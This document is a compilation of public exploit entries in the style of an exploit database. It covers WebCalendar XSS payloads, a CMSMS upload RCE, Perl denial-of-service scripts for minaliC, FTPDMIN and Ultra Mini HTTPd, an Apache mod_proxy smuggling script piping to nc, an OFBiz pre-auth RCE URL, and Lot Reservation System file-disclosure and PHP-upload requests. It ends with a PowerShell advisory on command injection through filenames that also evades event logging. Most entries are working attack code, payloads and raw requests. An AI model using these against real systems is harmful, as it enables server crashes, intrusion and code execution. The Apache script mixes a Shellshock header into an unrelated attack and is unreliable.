<pre><code># Exploit Title: WebCalendar Version: 1.3.0 - Stored XSS - Reflected XSS <br /># Date: 2024-3-1<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: http://www.k5n.us/webcalendar.php<br /># Version: 1.3.0<br /># Tested on: https://www.softaculous.com/apps/calendars/WebCalendar<br /><br />## Stored XSS<br /><br />1 ) Write Events > Add New Events > Brief Description : https://demos2.softaculous.com/WebCalendarvqsmnseug2/edit_entry.php?year=2024&month=01&day=03 <br /> this payload : <sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) You will bee alert button : https://demos2.softaculous.com/WebCalendarvqsmnseug2/month.php<br /><br /><br />=============================================================================================<br /><br />## Reflected XSS<br /><br />1 ) Go to this url and write payload : https://demos2.softaculous.com/WebCalendarvqsmnseug2/colors.php?color="><sVg/onLy=1 onLoaD=confirm(1)// <br /> Payload : "><sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) You will be see alert button <br /><br /><br />==============================================================================================<br /><br />## Reflected XSS<br /><br />1 ) Go to this url and write payload users parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=admin&form=editentryform&year=2024&month=1&day=3<br /> Payload : "><sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&form=editentryform&year=2024&month=1&day=3<br /><br />==============================================================================================<br /><br />## Reflected XSS<br /><br />1 ) Go to this url and write payload fday parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year%27&date=20240201<br /> Payload : "><sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&fmonth=rpt_month&fyear=rpt_year%27&date=20240201<br /><br /><br />===============================================================================================<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code>## Title: cmsms-2.2.19 - File Upload - RCE<br />## Author: nu11secur1ty<br />## Date: 12/29/2023<br />## Vendor: https://www.cmsmadesimple.org/<br />## Software: https://www.cmsmadesimple.org/downloads-header/cmsms/<br />## Reference: https://portswigger.net/web-security/file-upload,<br />https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload<br /><br />## Description:<br />The parameter "fileupload" in type ID is vulnerable to File Upload and<br />RCE attacks, it is not sanitized correctly. The attacker can upload a<br />virus directly on the server by using this web vulnerability, and then<br />he can execute it, this can be the end of this server depending on the<br />scenario! In this case, I just uploaded a [WebSocket] connector -<br />exploit.html to connect the server with my machine, this is so nasty.<br />I am a Penetration Tester, not a stupid cracker! Thank you all!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Exploit execution:<br /><br />```curl<br /> https://pwnedhost.com/uploads/exploit.html<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/cmsmadesimple.org/2023/CMSMS%E2%84%A2-2.2.19)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/12/cmsms-2219-file-upload-rce.html)<br /><br />## Time spent:<br />00:35:00<br /><br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use Socket;<br /><br /># Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 03 january 2024<br /># Vendor Homepage: http://minalic.sourceforge.net/<br /># Download to demo: https://drive.google.com/file/d/1WoDbps6up2s5Xa40YXDSABRU9J17yRQd/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: minaliC 2.0.0<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data via method GET to web server.<br />#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br />my $junk = "\x41" x 245;<br /><br />my $host = "\x41" x 135;<br />my $i=0;<br />while ($i <= 3) {<br />my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";<br /><br />my $sock;<br />socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";<br /><br />my $addr = sockaddr_in($port, inet_aton($ip));<br />connect($sock, $addr);<br /><br />send($sock, $buf, length($buf), 0);<br /><br />$i++;<br /><br />}<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "***************************************************\n";<br /> print "* minaliC 2.0.0 - Denied of Service *\n";<br /> print "* *\n";<br /> print "* Coded by Fernando Mengali *\n";<br /> print "* *\n";<br /> print "* e-mail: fernando.mengalli\@gmail.com *\n";<br /> print "* *\n";<br /> print "***************************************************\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code># Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through<br /># 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected<br /># when mod_proxy is enabled along with some form of RewriteRule or<br /># ProxyPassMatch in which a non-specific pattern matches some portion of the<br /># user-supplied request-target (URL) data and is then re-inserted into the<br /># proxied request-target using variable substitution. For example, something<br /># like: RewriteEngine on RewriteRule "^/here/(.*)" "<br /># http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/<br /># http://example.com:8080/ Request splitting/smuggling could result in bypass<br /># of access controls in the proxy server, proxying unintended URLs to<br /># existing origin servers, and cache poisoning. Users are recommended to<br /># update to at least version 2.4.56 of Apache HTTP Server.<br /><br />import requests<br /><br />def send_exploit(proxy_url):<br /> exploit_headers = {<br /> 'User-Agent': '() { :; }; /bin/echo -e "GET /here/../here HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /nonexistent HTTP/1.1\r\nHost: www.example.com\r\n\r\n" | nc example.com 80',<br /> 'Connection': 'close'<br /> }<br /><br /> exploit_url = 'http://example.com/here/../here'<br /> response = requests.get(exploit_url, headers=exploit_headers, proxies={'http': proxy_url, 'https': proxy_url})<br /><br /> print(response.text)<br /><br /># Usage<br />send_exploit('http://localhost:8080')<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use Net::FTP;<br /><br /># Exploit Title: FTPDMIN 0.96 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 2024-01-01<br /># Vendor Homepage: https://www.sentex.ca/~mwandel/ftpdmin/<br /># Download to demo:<br />https://drive.google.com/file/d/1CpfvaJbJVxR3HPWvcxIVipTaTj7RAaLd/view?usp=sharing<br /># Notification vendor: Yes reported<br /># Tested Version: FTPDMIN 0.96<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=q-CVJfYdd-g<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2<br />and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability<br />and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data via<br />FTP command RNFR.<br />#The following request sends a large amount of data to the FTP server to<br />process across command RNFR, the server will crash as soon as it is<br />received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash<br />the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /><br /> intro();<br /> main();<br /><br /> print "[+] Exploiting... \n";<br /><br /> my $buf = "\x41"x269;<br /> my $point = "\x45\x2a\x42\x7b";<br /> my $buf2 = "\x41"x126;<br /><br /> my $payload = "RNFR ".$buf . $point . $buf2;<br /><br /> my $ftp = Net::FTP->new($ip, Debug => 0) or die "Can't connect to<br />server: $@";<br /><br /> $ftp->login("anonymous",'anonymous');<br /><br /> $ftp->quot($payload);<br /><br /> $ftp->quit;<br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /><br /> sub intro {<br /> print "***************************************************\n";<br /> print "* FTPDMIN 0.96 - Denied of Service *\n";<br /> print "* *\n";<br /> print "* Coded by Fernando Mengali *\n";<br /> print "* *\n";<br /> print "* e-mail: fernando.mengalli\@gmail.com *\n";<br /> print "* *\n";<br /> print "***************************************************\n";<br /> }<br /><br /> sub main {<br /><br /> our ($ip) = @ARGV;<br /><br /> unless (defined($ip)) {<br /><br /> print " \nUsage: $0 <ip> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code># Exploit Title: Ultra Mini HTTPd 1.21 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 2024-01-01<br /># Vendor Homepage: https://acme.com/<br /># Software Link: https://acme.com/<br /># Notification vendor: Yes reported<br /># Tested Version: Ultra Mini HTTPd 1.21<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=HWOGeg3e5As<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data via GET.<br />#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $buffer = "\x41"x192;<br /><br /> my $payload = 'A' x 5438 . $buffer;<br /> my $i=0;<br /> while (i < 1) {<br /> <br /> my $socket = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br /> ) or die "Can't connect!!!!! \n\n";<br /> my $payload = "GET / $payload HTTP/1.1\r\nHost:$ip\r\n\r\n";<br /> $socket->send($payload);<br /> close($socket);<br /> $i++;<br /> }<br /><br /> print "[+] Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "***************************************************\n";<br /> print "* Ultra Mini HTTPd 1.21 - Denied of Service *\n";<br /> print "* *\n";<br /> print "* Coded by Fernando Mengali *\n";<br /> print "* *\n";<br /> print "* e-mail: fernando.mengalli\@gmail.com *\n";<br /> print "* *\n";<br /> print "***************************************************\n";<br /> }<br /><br /> sub main {<br /><br /> our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated.<br /></code></pre>
<pre><code>From: Jacques Le Roux <jleroux () apache org><br />Date: Mon, 04 Dec 2023 21:04:50 +0000<br /><br />Severity: moderate<br /><br />Affected versions:<br /><br />- Apache OFBiz before 18.12.10<br /><br />Description:<br /><br />Pre-auth RCE in Apache Ofbiz 18.12.09.<br /><br />It's due to XML-RPC no longer maintained still present.<br />This issue affects Apache OFBiz: before 18.12.10. <br />Users are recommended to upgrade to version 18.12.10<br /><br />This issue is being tracked as OFBIZ-12812 <br /><br />Credit:<br /><br />Siebene@ (finder)<br /><br />References:<br /><br />https://ofbiz.apache.org/download.html<br />https://ofbiz.apache.org/security.html<br />https://ofbiz.apache.org/release-notes-18.12.10.html<br />https://ofbiz.apache.org/<br />https://www.cve.org/CVERecord?id=CVE-2023-49070<br />https://issues.apache.org/jira/browse/OFBIZ-12812<br /><br /><br />-----<br />Packet Storm Note<br />Below is the proof of concept circulating on twitter:<br /><br />#POC: <br />/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y<br /><br /></code></pre>
<pre><code># Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability<br /># Google Dork: N/A<br /># Date: 10th December 2023<br /># Exploit Author: Elijah Mandila Syoyi<br /># Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip<br /># Version: 1.0<br /># Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0<br /># CVE : N/A<br /><br />Developer description about application purpose:-<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />About<br /><br />The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Vulnerability:-<br /><br />The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.<br /><br /><br /><br />Proof of Concept:-<br /><br />(HTTP POST Request)<br /><br />GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://192.168.150.228/lot/<br />Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9sn<br />Upgrade-Insecure-Requests: 1<br /><br /><br />The same can be achieved by removing the PHPSESSID cookie as below:-<br /><br /><br />GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://192.168.150.228/lot/<br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br />The file requested will be returned in base64 format in returned HTTP response.<br /><br />The attack can also be used to traverse directories to return files outside the web root.<br /><br /><br /><br />GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://192.168.150.228/lot/<br />Upgrade-Insecure-Requests: 1<br /><br /><br />This will return test.php file in the D:\ directory.<br /></code></pre>
<pre><code># Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution<br /># Google Dork: N/A<br /># Date: 10th December 2023<br /># Exploit Author: Elijah Mandila Syoyi<br /># Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip<br /># Version: 1.0<br /># Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0<br /># CVE : N/A<br /><br />Developer description about application purpose:-<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />About<br /><br />The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Vulnerability:-<br /><br />The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.<br /><br /><br /><br />Proof of Concept:-<br /><br />(HTTP POST Request)<br /><br />POST /lot/admin/ajax.php?action=save_division HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027<br />Content-Length: 606<br />Origin: http://192.168.150.228<br />Connection: close<br />Referer: http://192.168.150.228/lot/admin/index.php?page=divisions<br /><br /><br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="name"<br /><br />sample<br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="description"<br /><br />sample<br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="img"; filename="phpinfo.php"<br />Content-Type: application/x-php<br /><br /><?php phpinfo() ?><br /><br />-----------------------------217984066236596965684247013027--<br /><br /><br /><br />Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Microsoft Windows PowerShell<br /><br />Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.<br /><br /><br />[Vulnerability Type]<br />PowerShell Single Quote Code Execution / Event Log Bypass<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.<br />This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.<br />On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.<br />However, if the filename gets wrapped in single quotes it failed, that is until now.<br /><br />[Single Quote Code Exec Bypass]<br />Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.<br />The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.<br /><br />Take the following three test cases using Defender API which takes a specially crafted filename.<br />C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"<br /><br />1) Double quotes OK<br />"Test;saps DOOM;.xml" <br /><br />2) Single quotes FAILS<br />'Test;saps DOOM;.xml'<br /><br />3) Single quotes BYPASS<br />'Test&DOOM;.xml'<br /><br />PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.<br />C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'<br /><br />Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here<br />and that it also excludes the .EXE portion in that filename.<br /><br /><br />[PS Event Log Bypass]<br />On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.<br />However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.<br />Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.<br /><br />Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)<br />C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5<br /><br />Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.<br /><br />[PS Log ID 403 Snippet]<br />Engine state is changed from Available to Stopped. <br /><br />Details: <br /> NewEngineState=Stopped<br /> PreviousEngineState=Available<br /><br /> SequenceNumber=25<br /><br /> HostName=ConsoleHost<br /> HostVersion=5.1.19041.1682<br /> HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0<br /> HostApplication=powershell get-filehash 'Infected<br /> EngineVersion=5.1.19041.1682<br /><br /><br />[Exploit/POC]<br />powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5<br /><br />Run some malware plus bypass logging of true file name:<br />C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5<br />PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.<br /><br />Defender Anti-Malware API:<br />powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'<br /><br />Call ping cmd using double "&":<br />C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5<br /><br />Call a Windows cmd to Logoff the victim:<br />C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'<br /><br />We have options:<br /><br />A) to call commands use double "&" --> 'virus&logoff&test.zip'<br />B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'<br /><br /><br />[References]<br />https://github.com/hyp3rlinx/PSTrojanFile<br />https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt<br />https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: circa 2019<br />December 27, 2023 : Public Disclosure<br /><br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>